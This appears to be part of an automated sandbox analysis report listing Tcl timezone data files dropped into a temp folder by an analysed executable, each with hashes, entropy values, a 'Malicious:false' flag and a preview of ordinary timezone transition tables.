                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Etc\Zulu

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):153
                                                                                                                                                                                                                                                    Entropy (8bit):4.824450775594084
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqAxmSwFVAIgESRLyRaQEBURFu:SlSWB9IZaM3yzUFVAIgBLyRYaRI
                                                                                                                                                                                                                                                    MD5:64ED445C4272D11C85BD2CFC695F180F
                                                                                                                                                                                                                                                    SHA1:EDE76B52D3EEBCC75C50E17C053009A453D60D42
                                                                                                                                                                                                                                                    SHA-256:A68D32DA2214B81D1C0C318A5C77975DE7C4E184CB4D60F07858920B11D065FE
                                                                                                                                                                                                                                                    SHA-512:4CE8FC2B7C389BD2058CE77CD7234D4EA3F81F40204C9190BF0FB6AA693FB40D0638BFB0EB0D9FA20CB88804B73F6EE8202439C1F553B1293C6D2E5964216A1D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/UTC)]} {. LoadTimeZoneFile Etc/UTC.}.set TZData(:Etc/Zulu) $TZData(:Etc/UTC).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Amsterdam

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8783
                                                                                                                                                                                                                                                    Entropy (8bit):3.8169718785575446
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:nK5UUH6meG6EvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVab:K5VxSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:5CF449C3CF330CE76502C17B6AA67AE9
                                                                                                                                                                                                                                                    SHA1:D91114A1226ADD7FCD643068080791B4D75AA24B
                                                                                                                                                                                                                                                    SHA-256:C47E7F70080911EF797AE3384322E4A4A25AEBB4E9BB98290C03F541ECC67866
                                                                                                                                                                                                                                                    SHA-512:BE32A03279277E0DEC0B4465487872B940384E8B2F6DC8B0FC4D9DD4E33D63F9A83F057A923CFFC6176CB9A9882D366A7AE270C6A01B9975609DFAEC7EA11619
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Amsterdam) {. {-9223372036854775808 1172 0 LMT}. {-4260212372 1172 0 AMT}. {-1693700372 4772 1 NST}. {-1680484772 1172 0 AMT}. {-1663453172 4772 1 NST}. {-1650147572 1172 0 AMT}. {-1633213172 4772 1 NST}. {-1617488372 1172 0 AMT}. {-1601158772 4772 1 NST}. {-1586038772 1172 0 AMT}. {-1569709172 4772 1 NST}. {-1554589172 1172 0 AMT}. {-1538259572 4772 1 NST}. {-1523139572 1172 0 AMT}. {-1507501172 4772 1 NST}. {-1490566772 1172 0 AMT}. {-1470176372 4772 1 NST}. {-1459117172 1172 0 AMT}. {-1443997172 4772 1 NST}. {-1427667572 1172 0 AMT}. {-1406672372 4772 1 NST}. {-1396217972 1172 0 AMT}. {-1376950772 4772 1 NST}. {-1364768372 1172 0 AMT}. {-1345414772 4772 1 NST}. {-1333318772 1172 0 AMT}. {-1313792372 4772 1 NST}. {-1301264372 1172 0 AMT}. {-1282256372 4772 1 NST}. {-1269814772 1172 0 AMT}. {-1250720372 4772 1 NST}. {-123836517

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Andorra

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6690
                                                                                                                                                                                                                                                    Entropy (8bit):3.730744509734253
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:u7rRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:uXRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:13F10BC59FB9DBA47750CA0B3BFA25E9
                                                                                                                                                                                                                                                    SHA1:992E50F4111D55FEBE3CF8600F0B714E22DD2B16
                                                                                                                                                                                                                                                    SHA-256:E4F684F28AD24B60E21707820C40A99E83431A312D26E6093A198CB344C249DC
                                                                                                                                                                                                                                                    SHA-512:DA5255BDE684BE2C306C6782A61DE38BFCF9CFF5FD117EBDE5EF364A5ED76B5AB88E6F7E08337EEB2CEC9CB03238D9592941BDAA01DFB061F21085D386451AFA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Andorra) {. {-9223372036854775808 364 0 LMT}. {-2177453164 0 0 WET}. {-733881600 3600 0 CET}. {481078800 7200 0 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST}. {749005200 3600 0 CET}. {764730000 7200 1 CEST}. {780454800 3600 0 CET}. {796179600 7200 1 CEST}. {811904400 3600 0 CET}. {828234000 7200 1 CEST}. {846378000 3600 0 CET}. {859683600 7200 1 CEST}. {877827600 3600 0 CET}. {891133200 7200 1 CEST}. {909277200 3600 0 CET}. {922582800 7200 1 CEST}. {941331600 3600 0 CET}. {9540

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Athens

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7686
                                                                                                                                                                                                                                                    Entropy (8bit):3.635151038354021
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:JAK3+9wAuy+Hk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2l:JAKOK1XPzh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:D64695F05822EF0DF9E3762A1BC440A0
                                                                                                                                                                                                                                                    SHA1:F17F03CFD908753E28F2C67D2C8649B8E24C35F7
                                                                                                                                                                                                                                                    SHA-256:118289C1754C06024B36AE81FEE96603D182CB3B8D0FE0A7FD16AD34DB81374D
                                                                                                                                                                                                                                                    SHA-512:3C5BDE2004D6499B46D9BAB8DBFDCC1FC2A729EEA4635D8C6CB4279AEE9B5655CE93D2E3F09B3E7295468007FFB5BE6FEC5429501E8FB4D3C2BCC05177C2158A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Athens) {. {-9223372036854775808 5692 0 LMT}. {-2344642492 5692 0 AMT}. {-1686101632 7200 0 EET}. {-1182996000 10800 1 EEST}. {-1178161200 7200 0 EET}. {-906861600 10800 1 EEST}. {-904878000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844477200 7200 1 CEST}. {-828237600 3600 0 CET}. {-812422800 7200 0 EET}. {-552362400 10800 1 EEST}. {-541652400 7200 0 EET}. {166485600 10800 1 EEST}. {186184800 7200 0 EET}. {198028800 10800 1 EEST}. {213753600 7200 0 EET}. {228873600 10800 1 EEST}. {244080000 7200 0 EET}. {260323200 10800 1 EEST}. {275446800 7200 0 EET}. {291798000 10800 1 EEST}. {307407600 7200 0 EET}. {323388000 10800 1 EEST}. {338936400 7200 0 EET}. {347148000 7200 0 EET}. {354675600 10800 1 EEST}. {370400400 7200 0 EET}. {386125200 10800 1 EEST}. {401850000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {4490

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Belfast

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.827362756219521
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQahs3QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUy70U
                                                                                                                                                                                                                                                    MD5:19134F27463DEDF7E25BC72E031B856F
                                                                                                                                                                                                                                                    SHA1:40D9E60D26C592ED79747D1253A9094FCDE5FD33
                                                                                                                                                                                                                                                    SHA-256:5D31D69F259B5B2DFE016EB1B2B811BD51A1ED93011CBB34D2CF65E4806EB819
                                                                                                                                                                                                                                                    SHA-512:B80202194A9D547AEC3B845D267736D831FB7E720E171265AC3F0074C8B511518952BF686A235E6DDEFC11752C3BD8A48A184930879B68980AC60E9FAECBFB44
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Belfast) $TZData(:Europe/London).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Belgrade

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7059
                                                                                                                                                                                                                                                    Entropy (8bit):3.733102701717456
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:TX6TRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:TWRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:841E21EED6229503BF41A858601453B0
                                                                                                                                                                                                                                                    SHA1:6F5632B23F2C710106211FBCD2C17DC40B026BFB
                                                                                                                                                                                                                                                    SHA-256:813B4B4F13401D4F92B0F08FC1540936CCFF91EFD8B8D1A2C5429B23715C2748
                                                                                                                                                                                                                                                    SHA-512:85863B12F17A4F7FAC14DF4D3AB50CE33C7232A519F7F10CC521AC0F695CD645857BD0807F0A9B45C169DD7C1240E026C567B35D1D157EE3DB3C80A57063E8FE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Belgrade) {. {-9223372036854775808 4920 0 LMT}. {-2713915320 3600 0 CET}. {-905824800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-777942000 7200 1 CEST}. {-766623600 3600 0 CET}. {407199600 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CES

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Berlin

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7746
                                                                                                                                                                                                                                                    Entropy (8bit):3.733442486698092
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:hgt67dAtcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:hiGRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:D1E45A4660E00A361729FCD7413361C1
                                                                                                                                                                                                                                                    SHA1:BCC709103D07748E909DD999A954DFF7034F065F
                                                                                                                                                                                                                                                    SHA-256:EAD23E3F58706F79584C1F3F9944A48670F428CACBE9A344A52E19B541AB4F66
                                                                                                                                                                                                                                                    SHA-512:E3A0E6B4FC80A8D0215C81E95F9D3F71C0D9371EE0F6B2B7E966744C42FC64055370D322918EEA2917BFBA07030629C4493ADA257F9BD9C9BF6AD3C4A7FB1E70
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Berlin) {. {-9223372036854775808 3208 0 LMT}. {-2422054408 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-776559600 10800 0 CEMT}. {-765936000 7200 1 CEST}. {-761180400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733273200 3600 0 CET}. {-717631200 7200 1 CEST}. {-714610800 10800 1 CEMT}. {-710380800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Bratislava

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                    Entropy (8bit):4.89628096026481
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVtXrAevFVAIgoquXrELyQahcvEB5yQazXrY:SlSWB9IZaM3ymzbAevFVAIgozbELy7cY
                                                                                                                                                                                                                                                    MD5:7C0606BC846344D78A85B4C14CE85B95
                                                                                                                                                                                                                                                    SHA1:CEDFDC3C81E519413DDD634477533C89E8AF2E35
                                                                                                                                                                                                                                                    SHA-256:D7DF89C23D2803683FE3DB57BF326846C9B50E8685CCCF4230F24A5F4DC8E44E
                                                                                                                                                                                                                                                    SHA-512:8F07791DE5796B418FFD8945AE13BAB1C9842B8DDC073ED64E12EA8985619B93472C39DD44DA8FAEF5614F4E6B4A9D96E0F52B4ECA11B2CCA9806D2F8DDF2778
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Prague)]} {. LoadTimeZoneFile Europe/Prague.}.set TZData(:Europe/Bratislava) $TZData(:Europe/Prague).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Brussels

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8907
                                                                                                                                                                                                                                                    Entropy (8bit):3.75854119398076
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:BMlf+jdXtSYv9HMn2vDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHL:BMQSY1RSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:FA802B103E8829C07AE7E05DE7F3CD1F
                                                                                                                                                                                                                                                    SHA1:46AFB26E3E9102F0544C5294DA67DC41E8B2E8FC
                                                                                                                                                                                                                                                    SHA-256:AEB5860C2F041842229353E3F83CC2FEBC9518B115F869128E94A1605FB4A759
                                                                                                                                                                                                                                                    SHA-512:488CE6B524071D2B72F8AD73C2DC00F5F4C1C3C93F91165BDA0BCCB2B2C644B792C4220B785E84835ABE81584FDC87A1DCDA7679A69318052C3854167CB43C61
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Brussels) {. {-9223372036854775808 1050 0 LMT}. {-2840141850 1050 0 BMT}. {-2450953050 0 0 WET}. {-1740355200 3600 0 CET}. {-1693702800 7200 0 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1613826000 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585530000 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301263200 0 0 WET}. {-1284328800 3600 1 WEST}. {-126

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Bucharest

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7706
                                                                                                                                                                                                                                                    Entropy (8bit):3.6365022673390808
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:nQrdI+sYixX215VaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:nQrbEm1Oh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                    MD5:79AAB44507DD6D06FA673CA20D4CF223
                                                                                                                                                                                                                                                    SHA1:A2F1AA0E3F38EF24CD953C6B5E1EC29EA3EDB8C0
                                                                                                                                                                                                                                                    SHA-256:C40DC0C9EE5FFF9F329823325A71F3F38BE940F159E64E0B0CED27B280C1F318
                                                                                                                                                                                                                                                    SHA-512:BBEBB29FFD35A1F8B9D906795032976B3F69A0097ED7D764E3EB45574E66641C35F9006B3295FB090472FF5C09FC4D88D9249E924011A178EFB68D050AA6F871
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Bucharest) {. {-9223372036854775808 6264 0 LMT}. {-2469404664 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {296604000 10800 1 EEST}. {307486800 7200 0 EET}. {323816400 10800 1 EEST}. {338940000 7200 0 EET}. {354672000 10800 0 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Budapest

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7975
                                                                                                                                                                                                                                                    Entropy (8bit):3.7352769955376464
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ZpduGm56n0PcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:ZpMypRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:25864F8E5372B8E45B71D08667ED093C
                                                                                                                                                                                                                                                    SHA1:83463D25C839782E2619CD5BE613DA1BD08ACBB5
                                                                                                                                                                                                                                                    SHA-256:EF5CF8C9B3CA3F772A9C757A2CC1D561E00CB277A58E43ED583A450BBA654BF1
                                                                                                                                                                                                                                                    SHA-512:0DAB3CA0C82AA80A4F9CC04C191BE180EB41CCF87ADB31F26068D1E6A3A2F121678252E36E387B589552E6F7BA965F7E3F4633F1FD066FC7849B1FD554F39EC7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Budapest) {. {-9223372036854775808 4580 0 LMT}. {-2500938980 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1640998800 3600 0 CET}. {-1633212000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1600466400 7200 1 CEST}. {-1581202800 3600 0 CET}. {-906771600 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-778471200 7200 1 CEST}. {-762660000 3600 0 CET}. {-749689200 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-686185200 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {-621990000 7200 1 CEST}. {-605660400 3600 0 CET}. {-492656400 7200 1 CEST}. {-481168800 3600 0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Busingen

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.905738881351689
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVnCMPwVAIgoqkCMJW6yQahDZALMFB5h8Qa5CMP:SlSWB9IZaM3ym5XwVAIgo5Py7D17/8jH
                                                                                                                                                                                                                                                    MD5:811B7E0B0EDD151E52DF369B9017E7C0
                                                                                                                                                                                                                                                    SHA1:3C17D157A626F3AD7859BC0F667E0AB60E821D05
                                                                                                                                                                                                                                                    SHA-256:221C8BA73684ED7D8CD92978ED0A53A930500A2727621CE1ED96333787174E82
                                                                                                                                                                                                                                                    SHA-512:7F980E34BBCBC65BBF04526BF68684B3CE780611090392560569B414978709019D55F69368E98ADADC2C47116818A437D5C83F4E6CD40F4A1674D1CF90307CB5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Busingen) $TZData(:Europe/Zurich).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Chisinau

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7825
                                                                                                                                                                                                                                                    Entropy (8bit):3.6745178518482375
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:J2rdkayurqpGYtXfVA6bN3E48WLCtSYxUFtj2DVXvR2YuXOZp+eiXGEsTVVHU:J2r6GqpT9bN3E48GCujWYqK
                                                                                                                                                                                                                                                    MD5:E58F12EB1D0E8F0EBBF4ED95AD278F27
                                                                                                                                                                                                                                                    SHA1:6EEC2ED26C844D821275D4F2C60F03AF94E823E6
                                                                                                                                                                                                                                                    SHA-256:1280D19316512775DABE2EAD328E637C0BACE6192D84DB8570EF4300975BBF2F
                                                                                                                                                                                                                                                    SHA-512:3C04667C878DF2200A593259F1B826E485CD6BDC58FD1C685E36AB653FD1A81611D3CC7584878DE89BAEFFD1D1D7D9AA990BBE87A6D9BD6AB6350970B9A40182
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Chisinau) {. {-9223372036854775808 6920 0 LMT}. {-2840147720 6900 0 CMT}. {-1637114100 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {-927165600 10800 1 EEST}. {-898138800 7200 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-800154000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {4179

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Europe\Copenhagen

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7458
                                                                                                                                                                                                                                                    Entropy (8bit):3.736544358182077
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:1Fpd6z8cRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyo:1FpoRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:8FBF425E5833012C0A6276222721A106
